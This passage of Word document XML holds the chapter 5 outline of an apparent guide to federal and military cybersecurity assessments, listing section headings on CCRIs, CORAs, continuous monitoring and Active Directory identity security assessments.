    <w:p w14:paraId="051F50B9" w14:textId="164B2895" w:rsidR="00DE4058" w:rsidRDefault="00DE4058" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.1.4 Relationship Between RMF, Continuous Monitoring (ConMon), and Cybersecurity Assessments in Federal and Military Environments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00717780" w14:textId="054FD50D" w:rsidR="00DE4058" w:rsidRDefault="00DE4058" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.1.5 Compliance Validation Versus Operational Readiness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B83B32" w14:textId="75CB1FEF" w:rsidR="00DE4058" w:rsidRDefault="00DE4058" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.1.6 Why Assessments Are of Critical Importance to Active Directory Information Systems Security Officers (ISSOs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A70ED6E" w14:textId="33641975" w:rsidR="00DE4058" w:rsidRPr="00E24DE9" w:rsidRDefault="00DE4058" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E24DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5.2 Command and Combatant Cyber Readiness Inspections (CCRIs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBF1C82" w14:textId="40CC42DA" w:rsidR="00DE4058" w:rsidRDefault="00DE4058" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.2.1 Origins and Evolution of CCRIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2652D1C0" w14:textId="71E5B535" w:rsidR="00DE4058" w:rsidRDefault="00DE4058" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.2.2 Purpose and Objectives of CCRIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEC7628" w14:textId="1D52849A" w:rsidR="00DE4058" w:rsidRDefault="00DE4058" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.2.3 CCRI Assessment Methodologies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389B3997" w14:textId="6708B625" w:rsidR="00DE4058" w:rsidRDefault="00DE4058" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.2.4 CCRI Assessment Domains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD37D7D" w14:textId="7DC122A7" w:rsidR="00DE4058" w:rsidRDefault="00DE4058" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.2.5 CCRI Findings and Vulnerability Severity Scoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECB0F4F" w14:textId="40230385" w:rsidR="00DE4058" w:rsidRDefault="00DE4058" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.2.6 Strengths and Limitations of the CCRI Assessment Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C4D129" w14:textId="3E418032" w:rsidR="00DE4058" w:rsidRDefault="00DE4058" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.2.7 Historical Impact of CCRIs on Federal and Military Cybersecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320FBFD0" w14:textId="6B3A5FD8" w:rsidR="00DE4058" w:rsidRPr="00E24DE9" w:rsidRDefault="00DE4058" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E24DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5.3 Command and Combatant Cyber Operational Readiness Assessments (CORAs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60007BA4" w14:textId="4A2227AE" w:rsidR="00DE4058" w:rsidRDefault="00DE4058" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.3.1 Evolution From CCRI to CORA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45106FFB" w14:textId="08ECE839" w:rsidR="00DE4058" w:rsidRDefault="00DE4058" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.3.2 Purpose and Objectives of CORAs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1E6CB0" w14:textId="70D4E1CC" w:rsidR="00DE4058" w:rsidRDefault="00DE4058" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5.3.3 Operational Readiness Assessment Methodologies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43481488" w14:textId="5F0BC530" w:rsidR="00061C1A" w:rsidRDefault="00061C1A" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>5.3.3.1 Continuous Assessment Philosophy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39ACBF11" w14:textId="1488256C" w:rsidR="00061C1A" w:rsidRDefault="00061C1A" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>5.3.3.2 Key Indicators of Risk (KIORs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6D507D" w14:textId="149EAE78" w:rsidR="00061C1A" w:rsidRDefault="00061C1A" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>5.3.3.3 MITRE ATT&amp;CK Framework Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B13A288" w14:textId="7183D1E9" w:rsidR="00061C1A" w:rsidRDefault="00061C1A" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>5.3.3.4 Boundary Security Evaluation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E196D2" w14:textId="689F2BC4" w:rsidR="00061C1A" w:rsidRDefault="00061C1A" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>5.3.3.5 Threat-Informed Risk-Scoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F11A1E3" w14:textId="4F55E1D5" w:rsidR="00DE4058" w:rsidRDefault="00DE4058" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.3.4 Command and Combatant Mission Assurance and Risk-Based Evaluations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334EEB6B" w14:textId="66E2CCFC" w:rsidR="00DE4058" w:rsidRDefault="00DE4058" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.3.5 CORA Assessment Domains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002D4F23" w14:textId="56279172" w:rsidR="00061C1A" w:rsidRDefault="00061C1A" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>5.3.5.1 Cyber Maintenance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AA7776" w14:textId="69B62242" w:rsidR="00061C1A" w:rsidRDefault="00061C1A" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>5.3.5.2 Network Boundary Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDE81D1" w14:textId="2762B1B3" w:rsidR="00061C1A" w:rsidRDefault="00061C1A" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>5.3.5.3 Continuous Monitoring (ConMon) Programs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E266FF" w14:textId="70F562EB" w:rsidR="00061C1A" w:rsidRDefault="00061C1A" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>5.3.5.4 Vulnerability Management and Patch Compliance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C33A1CF" w14:textId="21B90AED" w:rsidR="00061C1A" w:rsidRDefault="00061C1A" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>5.3.5.5 Command and Combatant Mission Assurance Vulnerability Metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B9403D" w14:textId="035B0F86" w:rsidR="00DE4058" w:rsidRDefault="00DE4058" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.3.6 Operational Resilience and Cyber Readiness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E68DFCB" w14:textId="5BFC10A0" w:rsidR="00DE4058" w:rsidRDefault="00DE4058" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.3.7 CORA Findings and Reporting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CDCA29" w14:textId="56620C3D" w:rsidR="00DE4058" w:rsidRDefault="00DE4058" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.3.8 The Future of Federal and Military Cybersecurity Assessments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2A1987" w14:textId="662C847E" w:rsidR="00480F8E" w:rsidRPr="00E24DE9" w:rsidRDefault="00480F8E" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E24DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5.4 Identity-Centric Assessment Methodologies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA3E265" w14:textId="14E3E7CB" w:rsidR="00480F8E" w:rsidRDefault="00480F8E" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.4.1 Active Directory Security Assessments (ADSA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623999DA" w14:textId="69BE1FF9" w:rsidR="00480F8E" w:rsidRDefault="00480F8E" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.4.2 Authentication and Authorization Assessments (AA&amp;A)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A5638B" w14:textId="24FB5E10" w:rsidR="00480F8E" w:rsidRDefault="00480F8E" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.4.3 Privileged Access Management (PAM) Security Assessments (PAM-SA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4A74C9" w14:textId="229EB7E4" w:rsidR="00480F8E" w:rsidRDefault="00480F8E" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.4.4 Public Key Infrastructure (PKI) Security Assessments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE0FEAA" w14:textId="09BB2713" w:rsidR="00480F8E" w:rsidRDefault="00480F8E" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.4.5 Active Directory Certificate Services (AD CS) Security Assessments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DF4810" w14:textId="53BF132F" w:rsidR="00480F8E" w:rsidRDefault="00480F8E" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.4.6 Active Directory Federation Services (AD FS) Security Assessments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641AE401" w14:textId="54D8B624" w:rsidR="00480F8E" w:rsidRDefault="00480F8E" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.4.7 Microsoft Entra ID and Hybrid Identity Security Assessments</w:t>
      </w:r>
    </w:p>
